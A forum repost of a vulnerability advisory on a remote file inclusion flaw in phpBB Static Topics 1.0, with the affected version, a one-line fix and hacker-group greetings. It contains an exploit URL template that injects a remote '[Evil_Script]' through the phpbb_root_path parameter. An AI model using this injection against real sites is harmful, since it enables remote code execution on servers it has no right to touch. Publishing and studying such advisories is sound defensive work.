Jump to content
Guest Nemessis

[RST] phpBB Static Topics <= 1.0 RFI

By Guest Nemessis, in Proiecte RST

Recommended Posts

Guest Nemessis

Guest Nemessis

Posted
Posted

http://www.milw0rm.com/exploits/2477

---------------------------------------------------------------------------

phpBB Static Topics <= 1.0 [phpbb_root_path] Remote File Include Vulnerability

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : phpBB Static Topics

version : 1.0

URL : http://www.nivisec.com/downloads/phpbb/static_forums.zip

------------------------------------------------------------------

Exploit:

~~~~~

Variable $phpbb_root_path not sanitized.When register_globals=on an attacker ca

n exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/includes/functions_static_topics.php?phpbb_root_path=[Evil_Script]

---------------------------------------------------------------------------

Solution :

~~~~~~~

declare variabel $phpbb_root_path

---------------------------------------------------------------------------

Shoutz:

~~~

# Special greetz to my good friend [Oo]

# To all members of #h4cky0u and RST [ hTTp://rstcenter.com ]

---------------------------------------------------------------------------

*/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...